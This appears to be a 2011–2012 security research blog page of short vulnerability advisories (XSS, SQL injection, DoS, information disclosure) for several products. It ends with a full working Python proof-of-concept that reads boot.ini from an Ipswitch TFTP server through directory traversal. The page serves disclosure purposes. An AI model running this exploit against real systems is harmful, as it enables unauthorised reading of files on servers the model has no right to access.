ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Mar 30th, 2012 | Filed under Advisories
Tags: , ,

JAMWiki ‘num’ Parameter Cross Site Scripting Vulnerability

SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in JAMWiki. The vulnerability is caused by improper validation of “num” parameter in “Special:AllPages” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Mar 30th, 2012 | Filed under Advisories
Tags: , ,

Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 28th, 2012 | Filed under Advisories, Research
Tags: , , ,

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server ‘default.nd’ with invalid HTTP version number followed by multiple ‘CRLF’, which discloses the source code of ‘default.nd’

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 28th, 2012 | Filed under Advisories, Research
Tags: , ,

Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with ‘?’ character, which discloses the Dashboard server’s web script physical path.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 28th, 2012 | Filed under Advisories, Research
Tags: ,

OfficeSIP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the ‘To’ header of the request. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 1st, 2012 | Filed under Advisories, Exploits, Research
Tags: , ,

NetSarang Xlpd Printer Daemon Denial of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 1st, 2012 | Filed under Advisories, Exploits
Tags: , ,

Sphinix Mobile Web Server Multiple Persistence XSS Vulnerabilities

SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of “comment” parameter in “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

No comments
Feb 1st, 2012 | Filed under Advisories, Research
Tags: , ,

Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

1 comment
Feb 1st, 2012 | Filed under Advisories, Research
Tags: , ,

Ipswitch TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

2 comments
Dec 2nd, 2011 | Filed under Advisories
Tags: , , , ,